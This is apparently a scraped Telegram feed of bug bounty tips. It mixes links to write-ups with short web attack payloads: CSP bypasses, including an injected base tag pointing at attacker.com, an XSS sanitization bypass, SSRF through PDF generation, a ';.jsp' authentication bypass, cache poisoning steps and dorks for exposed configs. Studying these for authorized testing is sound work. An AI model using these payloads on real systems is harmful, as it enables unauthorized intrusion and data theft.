bugbounty_tech | Unsorted

Telegram channel bugbounty_tech - Bug bounty Tips

🛡️ Cybersecurity enthusiast | 💻 Helping secure the digital world | 🌐 Web App Tester | 🕵️‍♂️ OSINT Specialist Admin: @laazy_hack3r

Bug bounty Tips

#AppSec
#WebApp_Security
1. Critical UXSS in Opera Browser
https://medium.com/@renwa/when-ctf-meets-bug-bounty-a-critical-uxss-in-opera-browser-ee16f389e555
// Leak open tab URLs (flag included)
2. Subverting code integrity checks to locally backdoor Signal, 1Password, Slack, and more
https://blog.trailofbits.com/2025/09/03/subverting-code-integrity-checks-to-locally-backdoor-signal-1password-slack-and-more
// deep dive into Electron CVE-2025-55305
3. RCE through a vulnerability in Facebook Messenger for Windows
https://www.vulnano.com/2025/09/remote-code-execution-though.html
// Attacker: Pixel Fold, Android 14. Victim: Windows 11 Home 22H

Bug bounty Tips

#Space_Security
#WLAN_Security
"GPS Spoofing Attacks on Automated Frequency Coordination System in Wi-Fi 6E and Beyond", 2025.

// ...we demonstrate that GPS-based location reporting, which Wi-Fi APs use, can be spoofed using inexpensive, off-the-shelf radio equipment. This enables attackers to manipulate AP behavior, gain unauthorized spectrum access, cause harmful interference, or disable APs entirely by spoofing them into foreign locations

See also:
]-> GNSS-WASP: GNSS Wide Area SPoofing (.pdf)

Bug bounty Tips

Free Recon Course and Methodology For Bug Bounty Hunters

https://www.youtube.com/watch?v=evyxNUzl-HA

Bug bounty Tips

Web Cache Poisoning
small✅ checklist

Read Full Article : https://medium.com/@Aacle/web-cache-poisoning-part-2-weaponizing-headers-url-discrepancies-bbb7b2c0159a

• Test X-Forwarded-*, X-Host, X-Original-URL, User-Agent for reflection.

• Check Vary and target UA-specific poisoning when relevant.

• Try encoded dot-segments (%2e%2e, %2f, %5c) and observe X-Cache

• Test .css / .js extension flip on sensitive endpoints (CSPT)

• Seed cache via Burp parallel requests (first .js then main HTML)

• Use fresh IPs, low request rate, and record X-Cache, Age, CF-Cache-Status

• Run delimiter discovery (append random suffix → insert delimiter → compare).

Bug bounty Tips

🔥 SSRF hunters — 3 tiny tricks that turn “maybe” into provable (one-request) POCs — read the full playbook👇

• ⏱️ Timing-delay
• 🔁 Subdomain-rotation
• 🏷️ Header-correlation

Read the full Medium guide ➡️ https://medium.com/@Aacle/ssrf-part-3-advanced-tricks-timing-channels-out-of-the-box-detection-693c07c97015

Bug bounty Tips

First, understand this:
Content Security Policy = No XSS
It just means "XSS with extra steps"

🟩 : 70% of CSPs I encounter have misconfigurations that make them completely useless. #bugbounty #infosec

Here are the 👇 5 deadly mistakes developers make:

Mistake #1: 'unsafe-inline'

If you see this in script-src, you've already won.
Policy: script-src 'self' 'unsafe-inline'

Bypass: <script>alert(1)</script>
It literally allows ALL inline scripts.

Mistake #2: Wildcard Domains (*.google.com)
"It's Google, what could go wrong?"

Everything.

This JSONP endpoint on Google works on tons of apps: http://accounts.google.com/o/oauth2/revoke?callback=alert

Mistake #3: Missing base-uri
This is my favorite because it's ALWAYS overlooked.
Inject: <base href="https://attacker.com">

Now ALL relative script paths load from your domain.

Mistake #4: File Uploads on Whitelisted Domains
Policy: script-src 'self' http://cdn.example.com

If you can upload files to that CDN → game over.
Upload a .js file disguised as a profile picture. Direct S3 URL. Loaded as script.

Mistake #5: Trusting CDNs with Old Libraries

AngularJS versions < 1.6.0 have sandbox escapes.
If a whitelisted domain hosts old Angular → you can execute code.

Check http://ajax.googleapis.com for old versions. This works more often than you'd think.

This is just the beginning.

Part 2: Advanced nonce exploitation, AngularJS escapes, service workers
Part 3: DOM clobbering, mutation XSS, scriptless attacks

Full guide + testing checklist:
https://medium.com/@Aacle/a-bug-hunters-guide-to-csp-bypasses-part-1-69b606fd2699

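As an added illustration (not from the post or the linked guide): a small Python linter that flags mistakes 1, 2, 3 and 5 above in a Content-Security-Policy header value; mistake 4 (uploads reaching a whitelisted host) still needs a manual check of that host. The risky-host list is built only from the two hosts the post names and is an assumption, not a complete list.

```python
# Added example, not from the post or the linked guide: lint a CSP header value
# for mistakes 1, 2, 3 and 5 described above (mistake 4 needs a manual check).
from typing import Dict, List

# Hosts the post names as serving JSONP or old AngularJS (assumed, not exhaustive).
RISKY_SCRIPT_HOSTS = ("accounts.google.com", "ajax.googleapis.com")


def parse_csp(header: str) -> Dict[str, List[str]]:
    """Turn "dir src src; dir2 src" into {directive: [sources]}."""
    policy: Dict[str, List[str]] = {}
    for part in header.split(";"):
        tokens = part.strip().split()
        if tokens:
            policy[tokens[0].lower()] = tokens[1:]
    return policy


def source_allows(src: str, host: str) -> bool:
    """Does a host-source expression (host or *.domain) cover this host?"""
    src = src.lower().split("://")[-1].rstrip("/")
    if src.startswith("*."):
        return host == src[2:] or host.endswith(src[1:])
    return src == host


def lint_csp(header: str) -> List[str]:
    """Return one finding per detected mistake from the post."""
    policy = parse_csp(header)
    script_src = policy.get("script-src", policy.get("default-src", []))
    findings: List[str] = []
    # Mistake 1: 'unsafe-inline' in script-src accepts every inline script.
    if "'unsafe-inline'" in script_src:
        findings.append("script-src allows 'unsafe-inline'")
    for src in script_src:
        host_part = src.lower().split("://")[-1]
        # Mistake 2: a wildcard host trusts every subdomain, JSONP endpoints included.
        if "*" in host_part:
            findings.append(f"script-src trusts wildcard source {src}")
        # Mistakes 2 and 5: an allowed host that serves JSONP or old library copies.
        for host in RISKY_SCRIPT_HOSTS:
            if source_allows(src, host):
                findings.append(f"script-src source {src} covers risky host {host}")
    # Mistake 3: without base-uri an injected <base href> redirects relative script paths.
    if "base-uri" not in policy:
        findings.append("base-uri is not set")
    return findings
```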
Bug bounty Tips

This book is for understanding how APIs work and are developed

Bug bounty Tips

JSON WEB TOKEN

Bug bounty Tips

🚨CVE-2025-64095 (CVSS 10.0) : A Critical Flaw in DNN Platform Allows Unauthenticated Website Overwrite

⚡Dorks
HUNTER: product.name="DotNetNuke"

Bug bounty Tips

Extract all endpoints from a JS File and take your bug 🐞

- Method one (collect JS URLs for the hosts from the Wayback Machine, fetch each script, and grep out quoted path/URL strings and .get/.post/.ajax/.load call targets)
waybackurls HOSTS | tac | sed "s#\\\/#\/#g" \
  | egrep -o "src['\"]?\s*[=:]\s*['\"]?[^'\"]+\.js[^'\"> ]*" \
  | awk -F '//' '{if(length($2))print "https://"$2}' | sort -fu \
  | xargs -I '%' sh -c "curl -k -s \"%\" | sed \"s/[;}\)>]/\n/g\" | grep -Po \"(['\\\"](https?:)?[/]{1,2}[^'\\\"> ]{5,})|(\.(get|post|ajax|load)\s*\(\s*['\\\"](https?:)?[/]{1,2}[^'\\\"> ]{5,})\"" \
  | awk -F "['\"]" '{print $2}' | sort -fu


- Method two (pull quoted paths starting with / out of an already-downloaded JS file; output goes to a separate file so the input is not truncated while it is still being read)
cat JS.txt | grep -aoP "(?<=(\"|'|\`))\/[a-zA-Z0-9_?&=\/\-\#\.]*(?=(\"|'|\`))" | sort -u | tee endpoints.txt

#infosec #cybersec #bugbountytips

Bug bounty Tips

☄️JSRecon-Buddy - A simple browser extension to quickly find interesting security-related information on a webpage.

🔴
https://github.com/TheArqsz/JSRecon-Buddy

Bug bounty Tips

Black Hat USA 2025 Slides and files

Conference presentation slides

🔼 GitHub
🔼 InfoCon

❤ Share & Support & Reaction Us
🧩 #event

Bug bounty Tips

Hey Hunter's,
DarkShadow here back again!

SSRF in pdf generation!

This API endpoint sends the PDF generation request:
POST /api/v1/convert/markdown/pdf

Add this payload:
<img src="burp collab url" />

It returns 200 OK and the request hits Burp Collaborator.

You can follow me on x.com/darkshadow2bd

#ssrf #bugbountytips

Bug bounty Tips

☄️ Cheapest VPS for Bug Bounty & Pentesting

⚠️ https://brutsecurity.medium.com/cheapest-vps-for-bug-bounty-pentesting-fc6686572ee3

Bug bounty Tips

☄️ Malicious PDF Generator - Generate a bunch of malicious pdf files with phone-home functionality. Can be used with Burp Collaborator or Interact.sh

https://github.com/jonaslejon/malicious-pdf

Bug bounty Tips

#DevOps
#MLSecOps
#Whitepaper
"DoD Artificial Intelligence Cybersecurity Risk Management Tailoring Guide", Ver.2, July 2025.

// This guidance applies to any AI system used or operated by DoD Components and presents tailored guidance for system owners and authorizing officials to use when authorizing an AI system for operational use

Bug bounty Tips

#AIOps
#MLSecOps
"Cybersecurity AI: Hacking the AI Hackers via Prompt Injection", Aug. 2025.
]-> Prompt injection mitigation

// We present PoC exploits against the Cybersecurity AI (CAI) framework and its CLI tool, and detail our mitigations against such attacks in a multi-layered defense implementation

Bug bounty Tips

https://github.com/DivyanshGoel259/Churn-Prediction

Finally our first ANN project in which we trained a model for "Churn Prediction"

Bug bounty Tips

Part - 2
Web Cache Poisoning

Quick tip: test X-Forwarded-Host + extension flips (.css/.js) — if the edge caches your reflected header or JSON as a “static” asset, every visitor can get poisoned JS or tokens.

Read 5 practical PoCs & seeding recipes →
https://medium.com/@Aacle/web-cache-poisoning-part-2-weaponizing-headers-url-discrepancies-bbb7b2c0159a

Bug bounty Tips

Web Cache Poisoning Tips

Attacker mindset — don’t bruteforce: look for what the cache keys include. Host headers, cookies, query strings, Accept headers, and odd edge-case headers often end up in the key.

Make the app include your input in the key → you control cached output.

Read Full Article : https://medium.com/@Aacle/web-cache-poisoning-part-1-understanding-the-beast-d303f1741e48

Bug bounty Tips

How to Hack JWT using Burp Suite?

https://payatu.com/blog/jwt-vulnerabilities/

Bug bounty Tips

🔐 *How to Secure Your APIs – A Practical Guide*

APIs are the backbone of modern apps — but without security, they become open doors to attacks. Here's how to lock them down effectively:

---

✅ *1. Use Authentication & Authorization*
- Implement *OAuth2*, *JWT*, or *API keys*
- Enforce *role-based access control (RBAC)*

---

🔐 *2. Validate Inputs Strictly*
- Sanitize user inputs
- Use strong data validation (e.g., Joi, Yup)
- Prevent SQL & NoSQL injection

---

📦 *3. Rate Limiting & Throttling*
- Control request frequency to avoid abuse
- Use tools like *NGINX*, *API Gateway*, or *Cloudflare*

---

📜 *4. Use HTTPS Everywhere*
- Encrypt all data in transit
- Never expose APIs over HTTP

---

🕵️‍♂️ *5. Monitor & Log*
- Track unusual behavior
- Use centralized logging (e.g., ELK, Datadog)

---

🧱 *6. CORS & Firewall Rules*
- Restrict allowed origins
- Protect using *WAFs* and IP whitelisting

---

Secure APIs = Safe apps + Protected data + Trusted users
Build smart. Build safe.

Bug bounty Tips

🌐A big curated list of awesome resources useful during Penetration testing, Vulnerability assessments, Red/Blue Team operations, Bug Bounty and more🧠

Online tools for search info about:
- exploit⭐️
- vulnerabilities⭐️
- people⭐️
- emails⭐️
- phone numbers⭐️
- domains⭐️
- certificates⭐️

and more❤️.

https://github.com/edoardottt/awesome-hacker-search-engines

Learn Hacking from Basic to Pro❤️

Bug bounty Tips

Hey Hunter's,
Darkshadow here back again!

✨Authentication bypass method:

✅Steps:
1. Target..com/carbon/server-admin/memory_info.jsp = redirect to login page [301 status]

2. Target..com/carbon/server-admin/memory_info.jsp;.jsp = gives the page content without authentication [200 status]

Payload 👉🏼 ;.jsp


Tip:
1. Find sensitive paths in JS files which need authentication.
2. Try to find endpoints which end with an extension like: .php, .jsp, .shtml etc.
3. Simply fuzz every endpoint with the same extension payload like: ;.jsp ;.php ;.shtml

If any of these gives 200 OK, check manually. It might work!

Don't forget to show your love, guys ❤️

Bug bounty Tips

Hey Hunters,
DarkShadow here back again, dropping an

interesting XSS input sanitization bypass method.

You might have noticed that most websites currently use input sanitization by blocking certain tags and events, right!? Not really 😅

Okay, so first, have a look at some example tags that could trigger XSS:

script, img, a, iframe, object, video, audio, form, meta

The website blocks these keywords if they appear inside tags like < > or </ > and replaces them with nothing — basically, null or an empty string "".

So, if you try a payload like:

<script>alert(1)</script>


It will be replaced with:

alert(1)


Now, think a bit more deeply — what if you write a payload like this:

<script <img>> alert(1) </script </img>>

In this payload, look at the first part:
<script <img>>


Here, <img> is a full image tag, and it will definitely be removed by the sanitization filter. But what about <script<?

You can see the <script> tag isn’t written properly yet — it’s <script followed by <, so it doesn’t match the sanitization logic exactly.

Now, the interesting part is when the <img> tag gets removed from <script <img>>. After that, we’re left with <script>!

That means the transformation is like this:

<script <img>> → remove <img> → <script>

</script </img>> → remove </img> → </script>

And finally, we get a valid payload:

<script>alert(1)</script>


So guys, if you really like reading DarkShadow’s methodologies, show your LOVE.

And don’t forget to follow me 👉🏼 x.com/darkshadow2bd

#bugbountytips #xss

Bug bounty Tips

JSMap Inspector - A powerful, offline, single-file HTML tool designed for developers and security researchers to inspect and analyze JavaScript Source Map (.js.map) files.

https://github.com/ynsmroztas/JSMap-Inspector

Bug bounty Tips

🌀Download all bug bounty programs domains in scope items 🎯

😉Get a full list of domains from active bug bounty programs across platforms like HackerOne, Bugcrowd, Intigriti, and more – all in one place!💥

👇🏼Step 1: Download the domains.txt file

📂step 2: Extract only main/root domains

`cat domains.txt | awk -F '.' '{print $(NF-1)"."$NF}' | grep -Eo '([a-zA-Z0-9-]+\.)+[a-zA-Z]{2,}' | sort -u > main_domains`

📂Step 3: Extract all IP addresses:

`grep -Eo '\b([0-9]{1,3}\.){3}[0-9]{1,3}\b' domains.txt > ips.txt`

Don't forget to give reactions❤️

Bug bounty Tips

🔥Oneliner to download ALL of @assetnote's wordlists:

⌨️ wget -r --no-parent -R "index.html*" wordlists-cdn.assetnote.io/data/ -nH -e robots=off

Bug bounty Tips

Google Dork - XSS Prone Parameters 🔥

site:example[.]com inurl:q= | inurl:s= | inurl:search= | inurl:query= | inurl:keyword= | inurl:lang= inurl:&

Bug bounty Tips

🔥Google Dork - Exposed Configs 🔍

site:example[.]com ext:log | ext:txt | ext:conf | ext:cnf | ext:ini | ext:env | ext:sh | ext:bak | ext:backup | ext:swp | ext:old | ext:~ | ext:git | ext:svn | ext:htpasswd | ext:htaccess | ext:json

©TakSec
